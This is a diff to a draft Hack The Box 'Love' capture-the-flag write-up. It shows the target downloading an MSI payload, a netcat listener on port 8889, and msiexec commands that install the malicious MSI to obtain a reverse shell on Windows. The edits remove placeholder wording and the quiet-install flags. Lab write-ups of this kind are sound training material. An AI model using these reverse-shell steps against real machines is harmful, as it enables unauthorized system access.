tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Love-Writeup.md

 @@@10.10.10.239 - - [18/Apr/2022 11:03:17] "GET /rs.msi HTTP/1.1" 200 -@@@
 {% endhighlight %}

 Next, we execute "nc -lvp 8889" to start a netcat listener on port 8889.
-Then, we use msiexec to install our malicious MSI file.
-Note that we use \quiet to specify that x and \qn to specify that x.
-The \i flag is simply used to specify that we want to install an MSI file.
+Then, we use [msiexec](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec) to install our malicious MSI file.
+We use the `/i` flag to specify that we want to install an MSI file.
 {% highlight none linenos %}
-PS C:\xampp\htdocs\omrs\images> @@msiexec /quiet /qn /i C:\Windows\Temp\rs.msi@@ msiexec /quiet /qn /i C:\Windows\Temp\rs.msi
+PS C:\xampp\htdocs\omrs\images> @@msiexec /i C:\Windows\Temp\rs.msi@@
+msiexec /i C:\Windows\Temp\rs.msi
 PS C:\xampp\htdocs\omrs\images>
 {% endhighlight %}